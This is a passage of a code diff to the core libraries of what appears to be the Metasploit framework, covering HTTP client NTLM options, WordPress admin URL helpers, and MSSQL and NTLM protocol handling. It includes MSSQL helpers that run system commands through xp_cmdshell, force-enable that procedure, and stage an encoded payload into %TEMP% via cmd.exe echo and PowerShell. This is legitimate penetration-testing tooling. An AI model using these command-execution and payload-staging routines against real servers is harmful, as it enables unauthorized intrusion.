      if (self.client)
        disconnect
      end
-    end

-    self.client = nclient
+      self.client = nclient
+    end

    return nclient
  end
@@ -237,6 +255,12 @@ module Exploit::Remote::HttpClient
      evade_uri_fake_end:            datastore['HTTP::uri_fake_end'],
      evade_uri_fake_params_start:   datastore['HTTP::uri_fake_params_start'],
      evade_header_folding:          datastore['HTTP::header_folding'],
+      ntlm_use_ntlmv2_session:       datastore['NTLM::UseNTLM2_session'],
+      ntlm_use_ntlmv2:               datastore['NTLM::UseNTLMv2'],
+      ntlm_send_lm:                  datastore['NTLM::SendLM'],
+      ntlm_send_ntlm:                datastore['NTLM::SendNTLM'],
+      ntlm_send_spn:                 datastore['NTLM::SendSPN'],
+      ntlm_use_lm_key:               datastore['NTLM::UseLMKey'],
      ntlm_domain:                   datastore['DOMAIN'],
      digest_auth_iis:               datastore['DigestAuthIIS']
    }.merge(conf)
@@ -272,10 +296,6 @@ module Exploit::Remote::HttpClient
    end

    if (nclient == self.client)
-      if self.client.respond_to?(:close)
-        self.client.close
-      end
-
      self.client = nil
    end
  end
@@ -304,30 +324,9 @@ module Exploit::Remote::HttpClient
    begin
      c = connect(opts)
      r = c.request_raw(opts)
-
-      if datastore['HttpTrace']
-        print_line('#' * 20)
-        print_line('# Request:')
-        print_line('#' * 20)
-        print_line(r.to_s)
-      end
-
-      res = c.send_recv(r, actual_timeout)
-
-      if datastore['HttpTrace']
-        print_line('#' * 20)
-        print_line('# Response:')
-        print_line('#' * 20)
-        print_line(res.to_s)
-      end
-
-      res
-    rescue ::Errno::EPIPE, ::Timeout::Error => e
-      print_line(e.message) if datastore['HttpTrace']
+      c.send_recv(r, actual_timeout)
+    rescue ::Errno::EPIPE, ::Timeout::Error
      nil
-    rescue ::Exception => e
-      print_line(e.message) if datastore['HttpTrace']
-      raise e
    end
  end

@@ -335,9 +334,8 @@ module Exploit::Remote::HttpClient
  # Connects to the server, creates a request, sends the request,
  # reads the response
  #
-  # Passes `opts` through directly to {Rex::Proto::Http::Client#request_cgi}.
+  # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.
  #
-  # @return (see Rex::Proto::Http::Client#send_recv))
  def send_request_cgi(opts={}, timeout = 20)
    if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
      actual_timeout = datastore['HttpClientTimeout']
@@ -345,46 +343,23 @@ module Exploit::Remote::HttpClient
      actual_timeout =  opts[:timeout] || timeout
    end

-    print_line("*" * 20) if datastore['HttpTrace']
-
    begin
      c = connect(opts)
      r = c.request_cgi(opts)
-
-      if datastore['HttpTrace']
-        print_line('#' * 20)
-        print_line('# Request:')
-        print_line('#' * 20)
-        print_line(r.to_s)
-      end
-
-      res = c.send_recv(r, actual_timeout)
-
-      if datastore['HttpTrace']
-        print_line('#' * 20)
-        print_line('# Response:')
-        print_line('#' * 20)
-        print_line(res.to_s)
-      end
-
-      res
-    rescue ::Errno::EPIPE, ::Timeout::Error => e
-      print_line(e.message) if datastore['HttpTrace']
+      c.send_recv(r, actual_timeout)
+    rescue ::Errno::EPIPE, ::Timeout::Error
      nil
-    rescue ::Exception => e
-      print_line(e.message) if datastore['HttpTrace']
-      raise e
    end
  end

-  # Connects to the server, creates a request, sends the request, reads the
-  # response if a redirect (HTTP 30x response) is received it will attempt to
-  # follow the direct and retrieve that URI.
  #
-  # @note `opts` will be updated to the updated location and
-  #   `opts['redirect_uri']` will contain the full URI.
+  # Connects to the server, creates a request, sends the request, reads the response
+  # if a redirect (HTTP 30x response) is received it will attempt to follow the
+  # direct and retrieve that URI.
+  #
+  # @note The +opts+ will be updated to the updated location and +opts['redirect_uri']+
+  #   will contain the full URI.
  #
-  # @return (see #send_request_cgi)
  def send_request_cgi!(opts={}, timeout = 20, redirect_depth = 1)
    if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
      actual_timeout = datastore['HttpClientTimeout']
@@ -728,7 +703,7 @@ module Exploit::Remote::HttpClient

    # Create a new fingerprint structure to track this response
    fprint = {
-      :uri => uri, :method => method, :server_port => rport,
+      :uri => uri, :method => method,
      :code => res.code.to_s, :message => res.message.to_s,
      :signature => info
    }
@@ -115,13 +115,6 @@ module Msf::Exploit::Remote::HTTP::Wordpress::URIs
    normalize_uri(wordpress_url_wp_content, 'themes')
  end

-  # Returns the Wordpress uploads dir URL
-  #
-  # @return [String] Wordpress uploads dir URL
-  def wordpress_url_uploads
-    normalize_uri(wordpress_url_wp_content, 'uploads')
-  end
-
  # Returns the Wordpress XMLRPC URL
  #
  # @return [String] Wordpress XMLRPC URL
@@ -129,4 +122,17 @@ module Msf::Exploit::Remote::HTTP::Wordpress::URIs
    normalize_uri(target_uri.path, 'xmlrpc.php')
  end

+  # Returns the WordPress plugin installer URL
+  #
+  # @return [String] WordPress plugin installer URL
+  def wordpress_url_plugin_install
+    normalize_uri(wordpress_url_backend, 'plugin-install.php')
+  end
+
+  # Returns the WordPress new user URL
+  #
+  # @return [String] WordPress new user URL
+  def wordpress_url_new_user
+    normalize_uri(wordpress_url_backend, 'user-new.php')
+  end
 end
@@ -120,6 +120,3 @@ require 'msf/core/exploit/kerberos/client'

 # Fortinet
 require 'msf/core/exploit/fortinet'
-
-# Other
-require 'msf/core/exploit/windows_constants'
@@ -1,6 +1,11 @@
 # -*- coding: binary -*-
 require 'msf/core'
 require 'msf/core/exploit/mssql_commands'
+require 'rex/proto/ntlm/crypt'
+require 'rex/proto/ntlm/constants'
+require 'rex/proto/ntlm/utils'
+require 'rex/proto/ntlm/exceptions'
+

 module Msf

@@ -16,32 +21,41 @@ module Exploit::Remote::MSSQL
  include Exploit::Remote::Tcp
  include Exploit::Remote::NTLM::Client

+  #
+  # Constants
+  #
+  NTLM_CRYPT = Rex::Proto::NTLM::Crypt
+  NTLM_CONST = Rex::Proto::NTLM::Constants
+  NTLM_UTILS = Rex::Proto::NTLM::Utils
+  NTLM_XCEPT = Rex::Proto::NTLM::Exceptions
+
  # Encryption
  ENCRYPT_OFF     = 0x00 #Encryption is available but off.
  ENCRYPT_ON      = 0x01 #Encryption is available and on.
  ENCRYPT_NOT_SUP = 0x02 #Encryption is not available.
  ENCRYPT_REQ     = 0x03 #Encryption is required.

-  # Packet Type
-  TYPE_SQL_BATCH                   = 1  # (Client) SQL command
-  TYPE_PRE_TDS7_LOGIN              = 2  # (Client) Pre-login with version < 7 (unused)
-  TYPE_RPC                         = 3  # (Client) RPC
-  TYPE_TABLE_RESPONSE              = 4  # (Server)  Pre-Login Response ,Login Response, Row Data, Return Status, Return Parameters,
-  # Request Completion, Error and Info Messages, Attention Acknowledgement
-  TYPE_ATTENTION_SIGNAL            = 6  # (Client) Attention
-  TYPE_BULK_LOAD                   = 7  # (Client) SQL Command with binary data
+  # Paquet Type
+  TYPE_SQL_BATCH 		= 1 # (Client) SQL command
+  TYPE_PRE_TDS7_LOGIN	= 2 # (Client) Pre-login with version < 7 (unused)
+  TYPE_RPC		= 3 # (Client) RPC
+  TYPE_TABLE_RESPONSE	= 4 # (Server)  Pre-Login Response ,Login Response, Row Data, Return Status, Return Parameters,
+            # Request Completion, Error and Info Messages, Attention Acknowledgement
+  TYPE_ATTENTION_SIGNAL	= 6 # (Client) Attention
+  TYPE_BULK_LOAD		= 7 # (Client) SQL Command with binary data
  TYPE_TRANSACTION_MANAGER_REQUEST = 14 # (Client) Transaction request manager
-  TYPE_TDS7_LOGIN                  = 16 # (Client) Login
-  TYPE_SSPI_MESSAGE                = 17 # (Client) Login
-  TYPE_PRE_LOGIN_MESSAGE           = 18 # (Client) pre-login with version > 7
+  TYPE_TDS7_LOGIN 	= 16 # (Client) Login
+  TYPE_SSPI_MESSAGE 	= 17 # (Client) Login
+  TYPE_PRE_LOGIN_MESSAGE 	= 18 # (Client) pre-login with version > 7

  # Status
-  STATUS_NORMAL                  = 0x00
-  STATUS_END_OF_MESSAGE          = 0x01
-  STATUS_IGNORE_EVENT            = 0x02
-  STATUS_RESETCONNECTION         = 0x08 # TDS 7.1+
+  STATUS_NORMAL 		= 0x00
+  STATUS_END_OF_MESSAGE 	= 0x01
+  STATUS_IGNORE_EVENT	= 0x02
+  STATUS_RESETCONNECTION 	= 0x08 # TDS 7.1+
  STATUS_RESETCONNECTIONSKIPTRAN = 0x10 # TDS 7.3+

+
  #
  # Creates an instance of a MSSQL exploit module.
  #
@@ -86,13 +100,16 @@ module Exploit::Remote::MSSQL
          'MsfExploit' => self,
        })

+
    ping_sock.put("\x02")
-    resp, _saddr, _sport = ping_sock.recvfrom(65535, timeout)
+    resp, saddr, sport = ping_sock.recvfrom(65535, timeout)
    ping_sock.close

    return data if not resp
    return data if resp.length == 0

+    var = nil
+
    return mssql_ping_parse(resp)
  end

@@ -128,15 +145,15 @@ module Exploit::Remote::MSSQL
  #
  # Execute a system command via xp_cmdshell
  #
-  def mssql_xpcmdshell(cmd, doprint=false, opts={})
+  def mssql_xpcmdshell(cmd,doprint=false,opts={})
    force_enable = false
    begin
      res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", false, opts)
-      if res[:errors] && !res[:errors].empty?
-        if res[:errors].join =~ /xp_cmdshell/
-          if force_enable
+      if(res[:errors] and not res[:errors].empty?)
+        if(res[:errors].join =~ /xp_cmdshell/)
+          if(force_enable)
            print_error("The xp_cmdshell procedure is not available and could not be enabled")
-            raise RuntimeError, "Failed to execute command"
+            raise  RuntimeError, "Failed to execute command"
          else
            print_status("The server may have xp_cmdshell disabled, trying to enable it...")
            mssql_query(mssql_xpcmdshell_enable())
@@ -150,7 +167,7 @@ module Exploit::Remote::MSSQL
      return res

    rescue RuntimeError => e
-      if e.to_s =~ /xp_cmdshell disabled/
+      if(e.to_s =~ /xp_cmdshell disabled/)
        force_enable = true
        retry
      end
@@ -183,7 +200,7 @@ module Exploit::Remote::MSSQL
    idx = 0
    cnt = 500
    while(idx < hex.length - 1)
-      mssql_xpcmdshell("cmd.exe /c echo #{hex[idx, cnt]}>>%TEMP%\\#{var_payload}", false)
+      mssql_xpcmdshell("cmd.exe /c echo #{hex[idx,cnt]}>>%TEMP%\\#{var_payload}", false)
      idx += cnt
    end

@@ -217,7 +234,7 @@ module Exploit::Remote::MSSQL
    idx = 0
    cnt = 500
    while(idx < hex.length - 1)
-      mssql_xpcmdshell("cmd.exe /c echo #{hex[idx, cnt]}>>%TEMP%\\#{var_payload}", false)
+      mssql_xpcmdshell("cmd.exe /c echo #{hex[idx,cnt]}>>%TEMP%\\#{var_payload}", false)
      idx += cnt
    end
    print_status("Converting the payload utilizing PowerShell EncodedCommand...")
@@ -243,17 +260,17 @@ module Exploit::Remote::MSSQL

    while(not done)
      head = sock.get_once(8, timeout)
-      if !(head && head.length == 8)
+      if !(head and head.length == 8)
        return false
      end

      # Is this the last buffer?
-      if(head[1, 1] == "\x01" or not check_status )
+      if(head[1,1] == "\x01" or not check_status )
        done = true
      end

      # Grab this block's length
-      rlen = head[2, 2].unpack('n')[0] - 8
+      rlen = head[2,2].unpack('n')[0] - 8

      while(rlen > 0)
        buff = sock.get_once(rlen, timeout)
@@ -285,77 +302,77 @@ module Exploit::Remote::MSSQL
    pkt_data = ""


-    pkt_hdr =  [
-      TYPE_PRE_LOGIN_MESSAGE, #type
-      STATUS_END_OF_MESSAGE, #status
-      0x0000, #length
-      0x0000, # SPID
-      0x00, # PacketID
-      0x00 #Window
-    ]
+      pkt_hdr =	[
+          TYPE_PRE_LOGIN_MESSAGE, #type
+          STATUS_END_OF_MESSAGE, #status
+          0x0000, #length
+          0x0000, # SPID
+          0x00, # PacketID
+          0x00 #Window
+          ]

-    version = [0x55010008, 0x0000].pack("Vv")
-    encryption = ENCRYPT_NOT_SUP # off
-    instoptdata = "MSSQLServer\0"
+      version = [0x55010008,0x0000].pack("Vv")
+      encryption = ENCRYPT_NOT_SUP # off
+      instoptdata = "MSSQLServer\0"

-    threadid =   "\0\0" + Rex::Text.rand_text(2)
+      threadid =   "\0\0" + Rex::Text.rand_text(2)

-    idx = 21 # size of pkt_data_token
-    pkt_data_token <<  [
-      0x00, # Token 0 type Version
-      idx, # VersionOffset
-      version.length, # VersionLength
+      idx = 21 # size of pkt_data_token
+      pkt_data_token <<	[
+            0x00, 		# Token 0 type Version
+            idx , 	# VersionOffset
+            version.length, # VersionLength

-      0x01, # Token 1 type Encryption
-      idx = idx + version.length, # EncryptionOffset
-      0x01, # EncryptionLength
+            0x01, 			    	# Token 1 type Encryption
+            idx = idx + version.length, 	# EncryptionOffset
+            0x01, 			    	# EncryptionLength

-      0x02, # Token 2 type InstOpt
-      idx = idx + 1, # InstOptOffset
-      instoptdata.length, # InstOptLength
+            0x02, 				# Token 2 type InstOpt
+            idx = idx + 1,  		# InstOptOffset
+            instoptdata.length, 		# InstOptLength

-      0x03, # Token 3 type Threadid
-      idx + instoptdata.length, # ThreadIdOffset
-      0x04, # ThreadIdLength
+            0x03, 				# Token 3 type Threadid
+            idx + instoptdata.length, 	# ThreadIdOffset
+            0x04,				# ThreadIdLength

-      0xFF
-    ].pack("CnnCnnCnnCnnC")
+            0xFF
+            ].pack("CnnCnnCnnCnnC")

-    pkt_data << pkt_data_token
-    pkt_data << version
-    pkt_data << encryption
-    pkt_data << instoptdata
-    pkt_data << threadid
+      pkt_data  	<<	pkt_data_token
+      pkt_data  	<<	version
+      pkt_data  	<<	encryption
+      pkt_data  	<<	instoptdata
+      pkt_data  	<<	threadid

-    pkt_hdr[2] = pkt_data.length + 8
+      pkt_hdr[2]	= 	pkt_data.length + 8

-    pkt = pkt_hdr.pack("CCnnCC") + pkt_data
+      pkt 		= 	 pkt_hdr.pack("CCnnCC") + pkt_data

-    resp = mssql_send_recv(pkt)
+      resp = mssql_send_recv(pkt)

-    idx = 0
+      idx = 0

-    while resp && resp[0, 1] != "\xff" && resp.length > 5
-      token = resp.slice!(0, 5)
-      token = token.unpack("Cnn")
-      idx -= 5
-      if token[0] == 0x01
-        idx += token[1]
-        break
+      while resp and resp[0,1] != "\xff" and resp.length > 5
+        token = resp.slice!(0,5)
+        token = token.unpack("Cnn")
+        idx -= 5
+        if token[0] == 0x01
+
+          idx += token[1]
+          break
+        end
+      end
+      if idx > 0
+        encryption_mode = resp[idx,1].unpack("C")[0]
+      else
+        #force to ENCRYPT_NOT_SUP and hope for the best
+        encryption_mode = ENCRYPT_NOT_SUP
      end
-    end

-    if idx > 0
-      encryption_mode = resp[idx, 1].unpack("C")[0]
-    else
-      # force to ENCRYPT_NOT_SUP and hope for the best
-      encryption_mode = ENCRYPT_NOT_SUP
-    end
-
-    if encryption_mode != ENCRYPT_NOT_SUP && enc_error
-      raise RuntimeError,"Encryption is not supported"
-    end
-    encryption_mode
+      if encryption_mode != ENCRYPT_NOT_SUP and enc_error
+        raise RuntimeError,"Encryption is not supported"
+      end
+      encryption_mode
  end

  #
@@ -384,14 +401,14 @@ module Exploit::Remote::MSSQL
      idx = 0
      pkt = ''
      pkt_hdr = ''
-      pkt_hdr =  [
+      pkt_hdr =	[
          TYPE_TDS7_LOGIN, #type
          STATUS_END_OF_MESSAGE, #status
          0x0000, #length
          0x0000, # SPID
-          0x01,   # PacketID (unused upon specification
+          0x01, 	# PacketID (unused upon specification
            # but ms network monitor stil prefer 1 to decode correctly, wireshark don't care)
-          0x00   #Window
+          0x00 	#Window
          ]

      pkt << [
@@ -414,18 +431,19 @@ module Exploit::Remote::MSSQL
      sname = Rex::Text.to_unicode( rhost )
      dname = Rex::Text.to_unicode( db )

-      workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
+      ntlm_options = {
+          :signing 		=> false,
+          :usentlm2_session 	=> datastore['NTLM::UseNTLM2_session'],
+          :use_ntlmv2 		=> datastore['NTLM::UseNTLMv2'],
+          :send_lm 		=> datastore['NTLM::SendLM'],
+          :send_ntlm		=> datastore['NTLM::SendNTLM']
+          }

-      ntlm_client = ::Net::NTLM::Client.new(
-        user,
-        pass,
-        workstation: workstation_name,
-        domain: datastore['DOMAIN'],
-      )
-      type1 = ntlm_client.init_context
-      # SQL 2012, at least, does not support KEY_EXCHANGE
-      type1.flag &= ~ ::Net::NTLM::FLAGS[:KEY_EXCHANGE]
-      ntlmsspblob = type1.serialize
+      ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options)
+      workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
+      domain_name = datastore['DOMAIN']
+
+      ntlmsspblob = NTLM_UTILS::make_ntlmssp_blob_init(domain_name, workstation_name, ntlmssp_flags)

      idx = pkt.size + 50 # lengths below

@@ -466,9 +484,9 @@ module Exploit::Remote::MSSQL
      pkt << ntlmsspblob

      # Total packet length
-      pkt[0, 4] = [pkt.length].pack('V')
+      pkt[0,4] = [pkt.length].pack('V')

-      pkt_hdr[2] = pkt.length + 8
+      pkt_hdr[2]	= 	pkt.length + 8

      pkt = pkt_hdr.pack("CCnnCC") + pkt

@@ -476,36 +494,56 @@ module Exploit::Remote::MSSQL
      # has a strange behavior that differs from the specifications
      # upon receiving the ntlm_negociate request it send an ntlm_challenge but the status flag of the tds packet header
      # is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the ntlm_authentification
-      resp = mssql_send_recv(pkt, 15, false)
+      resp = mssql_send_recv(pkt,15, false)

-      unless resp.include?("NTLMSSP")
+      # Get default data
+      begin
+        blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(resp)
+      # a domain.length < 3 will hit this
+      rescue NTLM_XCEPT::NTLMMissingChallenge
        info = {:errors => []}
        mssql_parse_reply(resp, info)
        mssql_print_reply(info)
        return false
      end
+      challenge_key = blob_data[:challenge_key]
+      server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error
+      #netbios name
+      default_name =  blob_data[:default_name] || ''
+      #netbios domain
+      default_domain = blob_data[:default_domain] || ''
+      #dns name
+      dns_host_name =  blob_data[:dns_host_name] || ''
+      #dns domain
+      dns_domain_name =  blob_data[:dns_domain_name] || ''
+      #Client time
+      chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || ''

-      # Get default data
-      resp = resp[3..-1]
-      type3 = ntlm_client.init_context([resp].pack('m'))
-      type3_blob = type3.serialize
+      spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name =>  self.rhost}
+
+      resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(user, pass, challenge_key,
+                        domain_name, default_name, default_domain,
+                        dns_host_name, dns_domain_name, chall_MsvAvTimestamp,
+                        spnopt, ntlm_options)
+
+      ntlmssp = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, user, resp_lm, resp_ntlm, '', ntlmssp_flags)

      # Create an SSPIMessage
      idx = 0
      pkt = ''
      pkt_hdr = ''
-      pkt_hdr = [
-        TYPE_SSPI_MESSAGE, #type
-        STATUS_END_OF_MESSAGE, #status
-        0x0000, #length
-        0x0000, # SPID
-        0x01, # PacketID
-        0x00 #Window
-      ]
+      pkt_hdr =	[
+          TYPE_SSPI_MESSAGE, #type
+          STATUS_END_OF_MESSAGE, #status
+          0x0000, #length
+          0x0000, # SPID
+          0x01, # PacketID
+          0x00 #Window
+          ]

-      pkt_hdr[2] = type3_blob.length + 8
+      pkt_hdr[2]	= 	ntlmssp.length + 8

-      pkt = pkt_hdr.pack("CCnnCC") + type3_blob
+      pkt = pkt_hdr.pack("CCnnCC") + ntlmssp

      resp = mssql_send_recv(pkt)

@@ -582,7 +620,7 @@ module Exploit::Remote::MSSQL
      pkt << dname

      # Total packet length
-      pkt[0, 4] = [pkt.length].pack('V')
+      pkt[0,4] = [pkt.length].pack('V')

      # Embedded packet lengths
      pkt[pkt.index([0x12345678].pack('V')), 8] = [pkt.length].pack('V') * 2
@@ -599,7 +637,7 @@ module Exploit::Remote::MSSQL
    end

    info = {:errors => []}
-    info = mssql_parse_reply(resp, info)
+    info = mssql_parse_reply(resp,info)

    return false if not info
    info[:login_ack] ? true : false
@@ -652,19 +690,19 @@ module Exploit::Remote::MSSQL

    print_status("SQL Query: #{info[:sql]}")

-    if info[:done] && info[:done][:rows].to_i > 0
+    if(info[:done] and info[:done][:rows].to_i > 0)
      print_status("Row Count: #{info[:done][:rows]} (Status: #{info[:done][:status]} Command: #{info[:done][:cmd]})")
    end

-    if info[:errors] && !info[:errors].empty?
+    if(info[:errors] and not info[:errors].empty?)
      info[:errors].each do |err|
        print_error(err)
      end
    end

-    if info[:rows] && !info[:rows].empty?
+    if(info[:rows] and not info[:rows].empty?)

-      tbl = Rex::Text::Table.new(
+      tbl = Rex::Ui::Text::Table.new(
        'Indent'    => 1,
        'Header'    => "",
        'Columns'   => info[:colnames],
@@ -689,14 +727,14 @@ module Exploit::Remote::MSSQL
    info[:colnames] ||= []

    # Parse out the columns
-    cols = data.slice!(0, 2).unpack('v')[0]
+    cols = data.slice!(0,2).unpack('v')[0]
    0.upto(cols-1) do |col_idx|
      col = {}
      info[:colinfos][col_idx] = col

-      col[:utype] = data.slice!(0, 2).unpack('v')[0]
-      col[:flags] = data.slice!(0, 2).unpack('v')[0]
-      col[:type]  = data.slice!(0, 1).unpack('C')[0]
+      col[:utype] = data.slice!(0,2).unpack('v')[0]
+      col[:flags] = data.slice!(0,2).unpack('v')[0]
+      col[:type]  = data.slice!(0,1).unpack('C')[0]

      case col[:type]
      when 48
@@ -713,8 +751,8 @@ module Exploit::Remote::MSSQL

      when 34
        col[:id]            = :image
-        col[:max_size]      = data.slice!(0, 4).unpack('V')[0]
-        col[:value_length]  = data.slice!(0, 2).unpack('v')[0]
+        col[:max_size]      = data.slice!(0,4).unpack('V')[0]
+        col[:value_length]  = data.slice!(0,2).unpack('v')[0]
        col[:value]         = data.slice!(0, col[:value_length]  * 2).gsub("\x00", '')

      when 36
@@ -722,33 +760,33 @@ module Exploit::Remote::MSSQL

      when 38
        col[:id] = :int
-        col[:int_size] = data.slice!(0, 1).unpack('C')[0]
+        col[:int_size] = data.slice!(0,1).unpack('C')[0]

      when 127
        col[:id] = :bigint

      when 165
        col[:id] = :hex
-        col[:max_size] = data.slice!(0, 2).unpack('v')[0]
+        col[:max_size] = data.slice!(0,2).unpack('v')[0]

      when 173
        col[:id] = :hex # binary(2)
-        col[:max_size] = data.slice!(0, 2).unpack('v')[0]
+        col[:max_size] = data.slice!(0,2).unpack('v')[0]

-      when 231, 175, 167, 239
+      when 231,175,167,239
        col[:id] = :string
-        col[:max_size] = data.slice!(0, 2).unpack('v')[0]
-        col[:codepage] = data.slice!(0, 2).unpack('v')[0]
-        col[:cflags] = data.slice!(0, 2).unpack('v')[0]
-        col[:charset_id] =  data.slice!(0, 1).unpack('C')[0]
+        col[:max_size] = data.slice!(0,2).unpack('v')[0]
+        col[:codepage] = data.slice!(0,2).unpack('v')[0]
+        col[:cflags] = data.slice!(0,2).unpack('v')[0]
+        col[:charset_id] =  data.slice!(0,1).unpack('C')[0]

      else
        col[:id] = :unknown
      end

-      col[:msg_len] = data.slice!(0, 1).unpack('C')[0]
+      col[:msg_len] = data.slice!(0,1).unpack('C')[0]

-      if col[:msg_len] && col[:msg_len] > 0
+      if(col[:msg_len] and col[:msg_len] > 0)
        col[:name] = data.slice!(0, col[:msg_len] * 2).gsub("\x00", '')
      end
      info[:colnames] << (col[:name] || 'NULL')
@@ -762,7 +800,7 @@ module Exploit::Remote::MSSQL
    info[:errors] = []
    return if not data
    until data.empty?
-      token = data.slice!(0, 1).unpack('C')[0]
+      token = data.slice!(0,1).unpack('C')[0]
      case token
      when 0x81
        mssql_parse_tds_reply(data, info)
@@ -806,28 +844,28 @@ module Exploit::Remote::MSSQL
      case col[:id]
      when :hex
        str = ""
-        len = data.slice!(0, 2).unpack('v')[0]
-        if len > 0 && len < 65535
-          str << data.slice!(0, len)
+        len = data.slice!(0,2).unpack('v')[0]
+        if(len > 0 and len < 65535)
+          str << data.slice!(0,len)
        end
        row << str.unpack("H*")[0]

      when :string
        str = ""
-        len = data.slice!(0, 2).unpack('v')[0]
-        if len > 0 && len < 65535
-          str << data.slice!(0, len)
+        len = data.slice!(0,2).unpack('v')[0]
+        if(len > 0 and len < 65535)
+          str << data.slice!(0,len)
        end
        row << str.gsub("\x00", '')

      when :datetime
-        row << data.slice!(0, 8).unpack("H*")[0]
+        row << data.slice!(0,8).unpack("H*")[0]

      when :rawint
-        row << data.slice!(0, 4).unpack('V')[0]
+        row << data.slice!(0,4).unpack('V')[0]

      when :bigint
-        row << data.slice!(0, 8).unpack("H*")[0]
+        row << data.slice!(0,8).unpack("H*")[0]

      when :smallint
        row << data.slice!(0, 2).unpack("v")[0]
@@ -840,16 +878,16 @@ module Exploit::Remote::MSSQL

      when :image
        str = ''
-        len = data.slice!(0, 1).unpack('C')[0]
-        str = data.slice!(0, len) if len && len > 0
+        len = data.slice!(0,1).unpack('C')[0]
+        str = data.slice!(0,len) if (len and len > 0)
        row << str.unpack("H*")[0]

      when :int
        len = data.slice!(0, 1).unpack("C")[0]
-        raw = data.slice!(0, len) if len && len > 0
+        raw = data.slice!(0, len) if (len and len > 0)

        case len
-        when 0, 255
+        when 0,255
          row << ''
        when 1
          row << raw.unpack("C")[0]
@@ -862,7 +900,7 @@ module Exploit::Remote::MSSQL
        when 8
          row << raw.unpack('VV')[0] # XXX: missing high dword
        else
-          info[:errors] << "invalid integer size: #{len} #{data[0, 16].unpack("H*")[0]}"
+          info[:errors] << "invalid integer size: #{len} #{data[0,16].unpack("H*")[0]}"
        end
      else
        info[:errors] << "unknown column type: #{col.inspect}"
@@ -877,7 +915,7 @@ module Exploit::Remote::MSSQL
  # Parse a "ret" TDS token
  #
  def mssql_parse_ret(data, info)
-    ret = data.slice!(0, 4).unpack('N')[0]
+    ret = data.slice!(0,4).unpack('N')[0]
    info[:ret] = ret
    info
  end
@@ -886,7 +924,7 @@ module Exploit::Remote::MSSQL
  # Parse a "done" TDS token
  #
  def mssql_parse_done(data, info)
-    status, cmd, rows = data.slice!(0, 8).unpack('vvV')
+    status,cmd,rows = data.slice!(0,8).unpack('vvV')
    info[:done] = { :status => status, :cmd => cmd, :rows => rows }
    info
  end
@@ -895,11 +933,11 @@ module Exploit::Remote::MSSQL
  # Parse an "error" TDS token
  #
  def mssql_parse_error(data, info)
-    len  = data.slice!(0, 2).unpack('v')[0]
-    buff = data.slice!(0, len)
+    len  = data.slice!(0,2).unpack('v')[0]
+    buff = data.slice!(0,len)

-    errno, state, sev, elen = buff.slice!(0, 8).unpack('VCCv')
-    emsg = buff.slice!(0, elen * 2)
+    errno,state,sev,elen = buff.slice!(0,8).unpack('VCCv')
+    emsg = buff.slice!(0,elen * 2)
    emsg.gsub!("\x00", '')

    info[:errors] << "SQL Server Error ##{errno} (State:#{state} Severity:#{sev}): #{emsg}"
@@ -910,17 +948,17 @@ module Exploit::Remote::MSSQL
  # Parse an "environment change" TDS token
  #
  def mssql_parse_env(data, info)
-    len  = data.slice!(0, 2).unpack('v')[0]
-    buff = data.slice!(0, len)
-    type = buff.slice!(0, 1).unpack('C')[0]
+    len  = data.slice!(0,2).unpack('v')[0]
+    buff = data.slice!(0,len)
+    type = buff.slice!(0,1).unpack('C')[0]

    nval = ''
-    nlen = buff.slice!(0, 1).unpack('C')[0] || 0
-    nval = buff.slice!(0, nlen * 2).gsub("\x00", '') if nlen > 0
+    nlen = buff.slice!(0,1).unpack('C')[0] || 0
+    nval = buff.slice!(0,nlen*2).gsub("\x00", '') if nlen > 0

    oval = ''
-    olen = buff.slice!(0, 1).unpack('C')[0] || 0
-    oval = buff.slice!(0, olen * 2).gsub("\x00", '') if olen > 0
+    olen = buff.slice!(0,1).unpack('C')[0] || 0
+    oval = buff.slice!(0,olen*2).gsub("\x00", '') if olen > 0

    info[:envs] ||= []
    info[:envs] << { :type => type, :old => oval, :new => nval }
@@ -931,14 +969,14 @@ module Exploit::Remote::MSSQL
  # Parse an "information" TDS token
  #
  def mssql_parse_info(data, info)
-    len  = data.slice!(0, 2).unpack('v')[0]
-    buff = data.slice!(0, len)
+    len  = data.slice!(0,2).unpack('v')[0]
+    buff = data.slice!(0,len)

-    errno, state, sev, elen = buff.slice!(0, 8).unpack('VCCv')
-    emsg = buff.slice!(0, elen * 2)
+    errno,state,sev,elen = buff.slice!(0,8).unpack('VCCv')
+    emsg = buff.slice!(0,elen * 2)
    emsg.gsub!("\x00", '')

-    info[:infos] ||= []
+    info[:infos]||= []
    info[:infos] << "SQL Server Info ##{errno} (State:#{state} Severity:#{sev}): #{emsg}"
    info
  end
@@ -947,8 +985,8 @@ module Exploit::Remote::MSSQL
  # Parse a "login ack" TDS token
  #
  def mssql_parse_login_ack(data, info)
-    len = data.slice!(0, 2).unpack('v')[0]
-    _buff = data.slice!(0, len)
+    len  = data.slice!(0,2).unpack('v')[0]
+    buff = data.slice!(0,len)
    info[:login_ack] = true
  end
 end
@@ -17,6 +17,12 @@ module Msf

 module Exploit::NTLM

+  NTLM_CONST   = ::Rex::Proto::NTLM::Constants
+  NTLM_CRYPT   = ::Rex::Proto::NTLM::Crypt
+  NTLM_UTILS   = ::Rex::Proto::NTLM::Utils
+  NTLM_BASE    = ::Rex::Proto::NTLM::Base
+  NTLM_MESSAGE = ::Rex::Proto::NTLM::Message
+
  module Client
    def initialize(info = {})
      super
@@ -184,7 +184,7 @@ module Exploit::Remote::Postgres

  # If resp is not actually a Connection::Result object, then return
  # :error (but not an actual Exception, that's up to the caller.
-  # Otherwise, create a rowset using Rex::Text::Table (if there's
+  # Otherwise, create a rowset using Rex::Ui::Text::Table (if there's
  # more than 0 rows) and return :complete.
  def postgres_print_reply(resp=nil,sql=nil)
    ip = datastore['RHOST']
@@ -194,7 +194,7 @@ module Exploit::Remote::Postgres
    if resp.rows and resp.fields
